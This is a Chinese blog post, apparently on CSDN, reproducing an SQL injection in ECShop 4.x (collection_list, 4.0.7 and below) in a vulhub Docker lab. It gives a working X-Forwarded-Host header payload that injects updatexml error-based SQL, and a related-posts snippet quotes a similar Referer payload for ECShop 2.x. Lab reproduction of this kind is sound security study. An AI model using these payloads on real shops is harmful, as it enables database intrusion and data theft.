ECShop 4.x collection_listSQL注入

于 2023-11-27 16:38:40 发布
阅读量364 收藏
点赞数
文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56537388/article/details/134648105
版权

漏洞描述

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序

影响版本:ecshop4.0.7及以下

漏洞环境及利用

docker环境搭建

访问8080端口,数据库主机为mysql,账号密码为root

 注册一个账户然后登录

payload

X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a

漏洞利用

 

blackK_YC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入
qq_51577576的博客
10-01 1695
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入ECShop是上海商派网络科技有限公司(ShopEx)旗下——B2C独立网店系统,适合企业及个人快速构建个性化网上商店,系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。
ecshop测试_ECShop最新4.1.0前台免登录SQL注入0day漏洞披露与分析
weixin_36124631的博客
01-19 1177
0x00 漏洞概述影响版本:ecshop4.1.0及以下是否需要身份认证:否,前台漏洞漏洞类型:SQL注入CNVD编号:CNVD-2020-58823,https://www.cnvd.org.cn/flaw/show/2454613漏洞来源:xcheck代码安全检查源码获取:https://www.ecshop.com/,登录注册下载,最新版本为4.1.1(已修复)。0x01 漏洞详情...
ECShop 2.x/3.x SQL注入/远程代码执行漏洞
SwBack的博客
04-09 1349
ecshop 漏洞主要是因为 user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行.不需要登录即可远程写入webshell。
Eecshop 4.x collection_list SQL注入 漏洞复现
weixin_44896127的博客
12-20 591
Eecshop 4.x collection_list SQL注入漏洞复现。
(三)vulhub专栏:Ecshop Sql注入、远程代码执行漏洞复现
云舒的博客
07-05 1412
Referer值未做任何验证可被控制直接引用 采用_echash做分割,且为定值:2.x:554fcae493e564ee0dc75bdf2ebf94ca、3.x:45ea207d7a2b68c49582d2d22adf953a insert_ads函数的sql拼接不规范导致sql注入 make_val函数拼接字符串,拼接用户输入内容。......
ecshop-zidian.rar_ecshop_ecshop文件格式
09-19
ecshop非常全的数据字典,word文件格式
BaizeSec#bylibrary#ecshop2.x_命令执行1
07-25
代码执行在网站根目录下生成1.php的一句话。
aaa.rar_593aaa. com_ecshop_www .aaa709.com_www.aaa 647.com_商城
09-24
ecshop商城的代码,有点小改哦,ecshop商城的代码,有点小改哦
jbd.rar_ECSHOP templates_ecshop_ecshop template
09-19
ECSHOP模板,金百度模板、
ECShop_V4.1.6_UTF8_release20210624_88160501353699.zip,微信商城,小程序,pc端,支付功能都有
07-08
时下最流行的小微企业建站必备,安装即可使用
ECSHOP商城系统过滤不严导致SQL注入漏洞
盐碘
03-19 1538
添加时间: 2009-05-25 系统编号: WAVDB-01431 影响版本: ECSHOP 2.6.1/2.6.2 程序介绍:  ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。 漏洞分析: 文件includes/init.php判断g
ecshop 2.x 3.x sql injection/rce payload
weixin_34019144的博客
09-07 288
首先,感谢ringk3y的分析:http://ringk3y.com/2018/08/31/ec ... %E6%89%A7%E8%A1%8C/ 大家跟一遍代码基本上都能弄明白漏洞的原理,整个漏洞的构造还是很有意思的 然后网上公开的基本上都是2.x版本的payload,对于sql injection,除了文中提到的insert_ads,insert_bought_notes函数同样存在漏洞:...
ECSHOP 2.7.x sql注入漏洞分析
weixin_43263451的博客
04-16 3366
ecshop将我们可控的参数渲染进模板时,其中利用到$fun($para) 进行动态调用,而通过精心构造的payload使得$fun和$para我们可控,导致可以调用任何函数,从而达到sql注入 1. POC与复现 POC: Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:1:"1";s:2:"id";s:52:"1' and updatexml(0x7e,concat(0x7e,database()),0x7e)#";} 复现
关于ecshopsql注入漏洞修复
weixin_30439031的博客
07-20 149
ecshop系统部署在阿里云服务器上,阿里云提示Web-CMS漏洞: 修复方法如下: 1./admin/shopinfo.php 大概在第53、71、105、123行,4个地方修复方式都一样 admin_priv('shopinfo_manage'); 修改为 admin_priv('shopinfo_manage'); $_REQUEST['id'] = intv...
ecshop category.php?id=4,ecshop /category.php过滤不严导致SQL注入漏洞的修补方案
weixin_35702533的博客
03-11 308
1. 漏洞描述ecshop分类category.php过滤不严导致SQL注入漏洞2. 漏洞触发条件http://localhost/ecshop2.7.2/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min...
ecshop 2.x/3.x sql注入/任意代码执行漏洞
whatday的专栏
07-01 2041
影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代码执行。 值得一提的是攻击者利用的payload只适用于ECShop 2.x版本导致有部分安全分析者认为该漏洞不影响ECShop 3.x,这个是因为在3.x的版本里有引入防注...
ECShop 2.x/3.x SQL注入/任意代码执行漏洞
EC_Carrot的博客
05-31 411
漏洞背景 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。 漏洞复现 我这里用的是vulhub的环境,访问http://your-ip:8080将看到2.7.3的安装页面,访问http://your-ip:8081
: ecshop_ v4. 1. 6_ _utf8_ re lease20210624882 10902351063. zip
最新发布
09-15
ecshop_v4.1.6_utf8_re lease20210624882 10902351063.zip是一个文件的命名。根据命名可以推测出该文件是ECShop电商系统的一个版本,版本号是v4.1.6,并采用了UTF-8编码。文件名中的release20210624882表示该文件是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值